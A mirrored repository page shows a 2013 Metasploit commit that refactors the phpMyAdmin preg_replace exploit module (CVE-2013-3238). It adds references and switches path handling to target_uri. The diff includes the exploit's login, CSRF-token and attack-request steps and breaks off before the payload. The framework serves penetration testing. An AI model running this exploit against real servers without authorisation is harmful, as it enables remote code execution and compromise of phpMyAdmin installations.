infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add refs and use targeturi

unstable
Meatballs 2013-04-27 10:35:49 +01:00
parent 3ac041386b
commit 209188bc22
1 changed files with 8 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
modules/exploits/multi/http/phpmyadmin_preg_replace.rb
View File

@ -32,6 +32,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2013-3238' ],
[ 'PMASA', '2013-2'],
[ 'waraxe', '2013-SA#103' ],
[ 'EDB', '25003'],
[ 'OSVDB', '92793'],
[ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
[ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]
],
@ -54,19 +56,15 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
OptString.new('URI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
], self.class)
end
def uri(path="")
normalize_uri(datastore['PATH'], datastore['URI'], path)
end
def check
begin
res = send_request_cgi({ 'uri' => uri('/js/messages.php') })
res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/js/messages.php') })
rescue
print_error("Unable to connect to server.")
return CheckCode::Unknown
@ -115,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = target_uri.path
print_status("Grabbing CSRF token...")
response = send_request_cgi({ 'uri' => uri})
if response.nil?
@ -138,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
login = send_request_cgi({
'method' => 'POST',
'uri' => uri('index.php'),
'uri' => normalize_uri(uri, 'index.php'),
'vars_post' => post
})
@ -151,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
cookies = login.get_cookies
login_check = send_request_cgi({
'uri' => uri('index.php'),
'uri' => normalize_uri(uri, 'index.php'),
'vars_get' => { 'token' => token },
'cookie' => cookies
})
@ -164,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
db = rand_text_alpha(3+rand(3))
exploit_result = send_request_cgi({
'uri' => uri('db_structure.php'),
'uri' => normalize_uri(uri, 'db_structure.php'),
'method' => 'POST',
'cookie' => cookies,
'vars_post' => {